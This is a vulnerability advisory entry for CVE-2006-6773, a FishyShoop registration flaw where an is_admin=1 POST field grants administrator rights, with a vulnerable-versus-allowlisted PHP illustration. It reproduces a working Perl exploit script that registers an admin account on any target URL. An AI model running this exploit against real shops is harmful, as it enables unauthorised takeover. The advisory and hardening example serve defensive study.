FishyShoop 'register.php' Unauthorized Administrative Access Vulnerability

Vulnerability ID: 1111858
Vulnerability type: Access validation error
Published: 2006-12-25
Updated: 2007-01-02
CVE ID: CVE-2006-6773
CNNVD-ID: CNNVD-200612-579
Platform: PHP
CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/3011
https://cxsecurity.com/issue/WLB-2006120145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-579
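|Vulnerability Details
Fishyshoop is online shopping software. Its pages/register/register.php file takes every POST variable and inserts its value into the field of the same name in the new record. If the is_admin variable is set to 1 when registering through pages/register/register.php, the resulting account gains administrative privileges on the site.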
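The pattern described above next to an allowlisted form of the same handler, as an added example: this is not Fishyshoop's source code and not part of the original advisory. The `users` table and all function names are hypothetical; the field names are the ones named on this page.

```php
<?php
// Added illustration, NOT Fishyshoop source code. The `users` table and the
// function names are hypothetical; field names are those in the advisory.

// Pattern the advisory describes: every POST key becomes a column of the new row.
function build_insert_vulnerable(array $post): array
{
    unset($post['submit']);                 // form button, not a column
    return make_insert($post);              // client-chosen keys reach the schema
}

// Hardened form: only allowlisted fields are read from the request, and the
// privilege column is set by the server, never copied from client input.
function build_insert_hardened(array $post): array
{
    $row = [];
    foreach (['email', 'password'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field]) || $post[$field] === '') {
            throw new InvalidArgumentException("missing or invalid field: $field");
        }
        $row[$field] = $post[$field];
    }
    $row['password'] = password_hash($row['password'], PASSWORD_DEFAULT);
    $row['is_admin'] = 0;                   // decided server-side for every signup
    return make_insert($row);
}

// Shared helper: parameterised INSERT whose column list is the row's keys.
function make_insert(array $row): array
{
    $cols  = array_keys($row);
    $marks = implode(', ', array_fill(0, count($cols), '?'));
    return ['INSERT INTO users (' . implode(', ', $cols) . ") VALUES ($marks)", array_values($row)];
}

// Request fields the registration form never sends; worth logging.
function unexpected_fields(array $post): array
{
    return array_values(array_diff(array_keys($post), ['email', 'password', 'submit']));
}

// Constructed sample request body using the fields named in the advisory.
$post = ['email' => 'user@example.test', 'password' => 'constructed-pw',
         'is_admin' => '1', 'submit' => '1'];
[$sql, $params] = build_insert_vulnerable($post);
echo "vulnerable: $sql (is_admin=" . end($params) . ")\n";
[$sql, $params] = build_insert_hardened($post);
echo "hardened:   $sql (is_admin=" . end($params) . ")\n";
echo 'unexpected: ' . implode(', ', unexpected_fields($post)) . "\n";
```

The same allowlist belongs on any profile-update handler, since a field that can be injected at registration can usually be injected on edit as well.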
|Exploit
#!/usr/bin/perl
# James Gray <james6.0[@]gmail.com>
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
 print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
 exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

# milw0rm.com [2006-12-25]
|References

Source: BID
Name: 21731
Link: http://www.securityfocus.com/bid/21731
Source: BUGTRAQ
Name: 20061224 Fishyshoop Security Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/455260/100/0/threaded
Source: VUPEN
Name: ADV-2006-5182
Link: http://www.frsirt.com/english/advisories/2006/5182
Source: SECUNIA
Name: 23490
Link: http://secunia.com/advisories/23490
Source: SREASON
Name: 2077
Link: http://securityreason.com/securityalert/2077